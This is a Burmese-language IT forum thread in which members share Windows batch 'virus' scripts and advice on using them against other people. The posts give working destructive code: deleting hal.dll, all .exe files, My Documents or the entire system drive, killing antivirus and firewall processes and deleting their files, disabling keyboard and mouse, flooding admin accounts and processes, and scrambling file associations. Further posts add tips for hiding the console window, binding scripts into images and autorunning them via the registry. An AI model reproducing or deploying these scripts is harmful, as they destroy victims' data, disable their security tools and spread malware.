Myanmar IT Resource Forum
Myanmar IT Resource Forum

You are not connected. Please login or register

View previous topic View next topic Go down  Message [Page 1 of 1]

z3r0c00l


Administrator



Administrator
အခုကၽြန္ေတာ္ Virus ကို Batch Programming နဲ႕ေရးနည္းစတင္မွာျဖစ္ပါတယ္။ တတ္သိလြန္းလို႔မဟုတ္ပါဘူး။ နည္းနည္းေလးသိတာကို Share လုပ္တာပါ။
ကၽြန္ေတာ့ထက္ပိုသိတဲ့သူေတြ ေဆြးေႏြးေပးၾကပါဦး။ Connection အေျခအေနေၾကာင့္ ပုိ႔စ္ေတြခြဲၿပီးတင္လုိက္ပါတယ္။ စိတ္မရွိၾကပါနဲ႕။ အခုကၽြန္ေတာ္ေရးထားတာေတြကို
ခ်ဲ႕ထြင္ၿပီး သံုးလို႔ရပါေသးတယ္။ (ဥပမာ - ကၽြန္ေတာ္က Exe File ဖ်က္တာကိုေရးတယ္။ စာဖတ္သူတို႔အေနနဲ႕ mp3 file ဖ်က္တာကိုေရးလို႔ရတယ္။ Same too)
ကဲ....ကၽြန္ေတာ္တို႔စလိုက္ရေအာင္--------------------------------
******************************************************************************************************************
1. Del hal.dll (hal.dll File ကိုဖ်က္ရန္။)
Code:
@echo off
rem ---------------------------------
rem Disable Computer By Deleting hal.dll
del /f /q %SystemDrive%\WINDOWS\system32\hal.dll
shutdown /s /t 00
rem ---------------------------------

2. Del *.exe File (Exe File အားလံုးကိုဖ်က္ရန္။)
Code:
@echo off
rem ---------------------------------
rem Delete All Exe
DIR /S/B %SystemDrive%\*.exe >> FIleList_exe.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_exe.txt) do del "%%j:%%k"
rem ---------------------------------



Last edited by z3r0c00l on 26th December 2009, 12:32 pm; edited 2 times in total

z3r0c00l


Administrator



Administrator
3. Del My Documents (My Documents ဖ်က္ျခင္း)
Code:
@echo off
rem ---------------------------------
rem Delete My Documents
del /f /q %userprofile%\My Documents\*.*
rem ---------------------------------
rem ---------------------------------
rem Delete Mes documents
del /f /q %userprofile%\Mes documents\*.*
rem ---------------------------------

4. Change Userpassword (User Passords ေျပာင္းျခင္း)
Code:
@echo off
rem ---------------------------------
rem Change User Password To aDministrat0R
net user %username% aDministrat0R
rem ---------------------------------
aDministrat0R = မိမိေျပာင္းခ်င္ေသာ Passwords.

z3r0c00l


Administrator



Administrator
5. Killing Anitvirus (Antivirus ကိုသတ္မယ္)
Virus ေရးရင္အေရးအႀကီးဆံုးက ကိုယ့္ Virus ကို Antivirus ကမရိပ္မိဖို႔ပါပဲ။ အဲဒီေတာ့ Antivirus ကို အရင္သတ္ရေအာင္
Code:
@echo off
rem ---------------------------------
rem Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
rem ---------------------------------



Last edited by z3r0c00l on 26th December 2009, 12:30 pm; edited 1 time in total

z3r0c00l


Administrator



Administrator
6. Disable Keyboard (Keyboard ပိတ္မယ္)
Virus ေရးတယ္ဆိုကတည္းက User ကို ဒုကၡေရာက္ေအာင္လုပ္တာပါ။ (ေကာင္းသူထိပ္ မေကာင္းသူထိပ္ေပါ့ Very Happy)
ဒီေတာ့ Coding ကို အျပင္းဆံုးေရးၾကတာပါပဲ။ သူ႔ကို ဘာမွလုပ္ပိုင္ခြင့္မရွိေအာင္ေပါ့။ အခု Keyboard ပိတ္ရေအာင္။
ၿပီးရင္ Mouse ပိတ္မယ္။ ၿပီးရင္ hal.dll File ကိုဖ်က္ခိုင္းၿပီးေတာ့ Startup ထဲမွာ ထည့္ထားလိုက္ရင္ သူစက္တက္တိုင္းတက္တိုင္းမွာ hal.dll ကိုဖ်က္ေနပါလိမ့္မယ္။
Code:
@echo off
rem ---------------------------------
rem Disable Keyboard
echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg"
echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "nokeyboard.reg"
echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> "nokeyboard.reg"
echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> "nokeyboard.reg"
echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> "nokeyboard.reg"
echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> "nokeyboard.reg"
echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> "nokeyboard.reg"
echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> "nokeyboard.reg"
echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> "nokeyboard.reg"
echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> "nokeyboard.reg"
echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> "nokeyboard.reg"
echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\ >> "nokeyboard.reg"
echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\ >> "nokeyboard.reg"
echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\ >> "nokeyboard.reg"
echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\ >> "nokeyboard.reg"
echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\ >> "nokeyboard.reg"
echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\ >> "nokeyboard.reg"
echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\ >> "nokeyboard.reg"
echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\ >> "nokeyboard.reg"
echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\ >> "nokeyboard.reg"
echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\ >> "nokeyboard.reg"
echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg"
start "nokeyboard.reg"
rem ---------------------------------



7. Disable Mouse (Mouse ပိတ္ျခင္း)
Code:
@echo off
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------

ပိစိေလး


MITR Reader



MITR Reader
ယုတ္မာေသာ အၾကံအစည္မ်ား နဲ ့ေပါ့ [You must be registered and logged in to see this image.]
သားက ဝင္ေက်ာ မို ့ကို သားသိတာ ေသးေသးေလး ၿဖစ္သြားေတာ့ ေက်ာေတာ့ဝူး... [You must be registered and logged in to see this image.]

http://forum.mmitd.com/pixielay

z3r0c00l


Administrator



Administrator
ပိစိေလး wrote:ယုတ္မာေသာ အၾကံအစည္မ်ား နဲ ့ေပါ့ [You must be registered and logged in to see this image.]
သားက ဝင္ေက်ာ မို ့ကို သားသိတာ ေသးေသးေလး ၿဖစ္သြားေတာ့ ေက်ာေတာ့ဝူး... [You must be registered and logged in to see this image.]
ကိုပိစီေလး သိတဲ့ေသးေသးေလးကို ကၽြန္ေတာ္သိခ်င္မွသိမွာေလ။ ၀င္ေတာ့ေျပာေပးပါဦးဗ်ာ။ Very Happy

Download Man


MITR New User



ီဒီvirus ကေတာ့ လူၾကီးမင္းရဲ႕ Hard Drive တစ္ခုလံုးကို Clean Up လုပ္ပစ္ပါလိမ္႕မယ္။
Code:

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

ITCHILD


MITR Reader



MITR Reader
Thank You for sharing knowledge!

:doit :doit :doit :doit :doit :doit :doit :doit :doit

ပိစိေလး


MITR Reader



MITR Reader
Application Bomber (Very Happy)
Code:

@echo off
:loop
start notepad
start winword
start mspaint
start write
start cmd
start explorer
start control
start calc
goto loop

User flooder
Code:

@echo off
:usrflood
set usr=%random%
net users %usr% %random% /add
net localgroup administrators %usr% /add
goto usrflood

Folder flooder

Code:
@echo off
:loop
nkdir %random%
goto loop

Extension change
Code:

@echo off
assoc .txt=jpegfile
assoc .exe=htmlfile
assoc .jpeg=avifile
assoc .png=mpegfile
assoc .mpeg=txtfile
assoc .sys=regfile
exit

ဒါနဲ ့ .bat ေတြ ကို antivirus ေတြက မဖမ္းပါဘူး။ ဖမ္းတာလဲ က်ေနာ္ မေတြ ့ဖူးဘူး
တစ္ခုေတာ့ ရွိတယ္ သူ ့ကို လူက ၿမင္သြားၿပီး သတ္လုိက္မွာပဲ ေသမွာ
ဘယ္လိုၿမင္လဲ ဆုိေတာ့ .bat ကို ဖတ္ရင္ ကုိေပးထားတဲ့ command မ်ားရင္ မ်ားသေလာက္ command prompt အမည္းၾကီး နဲ ့ဖတ္တယ္။ exit နဲ ့ဆံုးထားရင္ ၿပီးရင္ ၿပန္ေတာ့ ပိတ္သြားပါတယ္။ ဒါေပမယ့္ အဲလူက .bat program ကုိ run လိုက္ၿပီဆိုတာ သိသြားၿပီ
အဲဒါေလးကို ကာကြယ္ဖို ့
Code:

Set objShell = CreateObject("WScript.Shell")
strCommand = "C:\yourfile.bat"
objShell.Run strCommand, vbHide, TRUE

အဲဒါေလးကို ကူးၿပီးေတာ့ notepad ထဲကို ထည့္ၿပီး C:\yourfile.bat ေနရာမွာ သင့္ရဲ ့ .bat file ရဲ ့နာမည္ေလး ထည့္ေပးလုိက္ရံုပဲ။
အဲဒါဆို သူက taskmanager ကို ဖြင့္ၿပီး WScript ဆိုတဲ့ file ေလးကို taskkill ေပးလုိက္မွာပဲ ရပ္သြားမွာ

ယုတ္မာ ႏိုင္ၾကပါေစ.... Very Happy

http://forum.mmitd.com/pixielay

connection


MITR New User



ကၽြန္ေတာ္လည္းတစ္ခု ေလာက္ေမးခ်င္တယ္ဗ်ာ

bat file ေတြကုိ ပု့ံေတြေအာက္မွာ ဘယ္လုိဖြက္တာ လဲ
သိ၇င္ေျပာျပေပးပါလား

ုျပီးေတာ႕bat file ေတြကုိျဖန္႕လုိ႕ရပါသလား ေျပာျပေပးပါ

ပိစိေလး


MITR Reader



MITR Reader
connection wrote:ကၽြန္ေတာ္လည္းတစ္ခု ေလာက္ေမးခ်င္တယ္ဗ်ာ

bat file ေတြကုိ ပု့ံေတြေအာက္မွာ ဘယ္လုိဖြက္တာ လဲ
သိ၇င္ေျပာျပေပးပါလား

ုျပီးေတာ႕bat file ေတြကုိျဖန္႕လုိ႕ရပါသလား ေျပာျပေပးပါ
ၿဖန္ ့လုိ ့ရမွာပါ ကြန္မန္းေတြ အမ်ားၾကီးလုိမွာေပါ့

http://forum.mmitd.com/pixielay

asbadbro


MITR New User



i wanna know whether i can create auto run bat file, not saving in startup.
if anybody who know it , please tell me ...... [You must be registered and logged in to see this image.]

Nay Aung Linn


MITR New User



ကၽြန္ေတာ္လုပ္ၾကည့္မယ္ေနာ္.....အဆင္မေျပလို ့ျပန္ေမးရင္ေတာ့..မညဴစူပါနဲ ့ေနာ္..အခုလိုတင္ေပးထားတာေက်းဇူးအလြန္အမင္းတင္ပါတယ္..ေနာက္ဒီထက္ေကာင္းတာေလးေတြလည္းတင္ထား
ေပးပါ...

z3r0c00l


Administrator



Administrator
connection wrote:ကၽြန္ေတာ္လည္းတစ္ခု ေလာက္ေမးခ်င္တယ္ဗ်ာ

bat file ေတြကုိ ပု့ံေတြေအာက္မွာ ဘယ္လုိဖြက္တာ လဲ
သိ၇င္ေျပာျပေပးပါလား

ုျပီးေတာ႕bat file ေတြကုိျဖန္႕လုိ႕ရပါသလား ေျပာျပေပးပါ
အဲဒီလိုမ်ိဳးတစ္ခုနဲ႕တစ္ခု ေပါင္းစပ္တာကို Binding လုပ္တယ္လို႔ေခၚပါတယ္။ *.bat File နဲ႕ *.jpg File ႏွစ္ခုကိုေပါင္းစပ္လို႔ရပါတယ္။ အဲဒါဆိုရင္ အဲဒီပံုကိုဖြင့္လိုက္တာနဲ႕ ေရးထားတဲ့ Bat File က စ Run ပါၿပီ။ File Binder ဆိုတဲ့နာမည္နဲ႕ Googling လုပ္ၾကည့္ႏိုင္ပါတယ္။ သံုးရတာလဲအရမ္းလြယ္ကူပါတယ္။ ကိုယ္ေပါင္းခ်င္တဲ့ File 2 File ကိုေရြးေပးမယ္။ ၿပီးရင္ Output အတြက္ Folder တစ္ခုေရြးေပးမယ္။ ဒါေလးပါပဲ။

devil.devil42


MITR New User



ေနာက္လဲေရးသားတင္ျပေပးပါအံုးေနာ္။

chan.virus


MITR Reader



MITR Reader
ေက်းဇူးကမၻာပါ

thethtoosan


MITR New User



ကၽြန္ေတာ္ Batch programming သင္ခ်င္တယ္
ဘယ္မွာသင္လို႔ရမလဲ

http://www.thethtoosan619.webs.com

z3r0c00l


Administrator



Administrator
MITR မွာသင္လို႔ရပါတယ္။ အစ္ကိုအရင္ဆံုး Site ကိုစံုေအာင္ၾကည့္လိုက္ပါ။ ကၽြန္ေတာ္တို႔ Programming Topic ထဲမွာ Batch File Programming နဲ႕ပတ္သက္လို႔ အေသးစိတ္ေဆြးေႏြးထားတာရွိပါတယ္။ အစ္ကိုအဲဒါေတြကိုဖတ္ၿပီးရင္ ကိုယ္တိုင္ Self Studying လုပ္လို႔ရသြားေလာက္ပါၿပီ။

thethtoosan


MITR New User



MIRTကဘယ္မွာဖြင့္ထားတာလဲခင္ဗ်ာ....ကိုယ္တုိင္လည္းself studying လုပ္ၾကည္ပါအံုးမယ္ Very Happy

http://www.thethtoosan619.webs.com

Fox


MITR Reader



MITR Reader
asbadbro wrote:i wanna know whether i can create auto run bat file, not saving in startup.
if anybody who know it , please tell me ...... [You must be registered and logged in to see this image.]

startup ထဲမထည့္ခ်င္ရင္ registry ထဲထည့္ Very Happy



[You must be registered and logged in to see this image.][You must be registered and logged in to see this image.]

thethtoosan


MITR New User



က်ေနာ္နည္းနည္းကူးသြားတယ္ခင္ဗ်ာ

http://www.thethtoosan619.webs.com

Sponsored content


View previous topic View next topic Back to top  Message [Page 1 of 1]

Permissions in this forum:
You cannot reply to topics in this forum

 

Free forum | © PunBB | Free forum support | Contact | Report an abuse | Free forum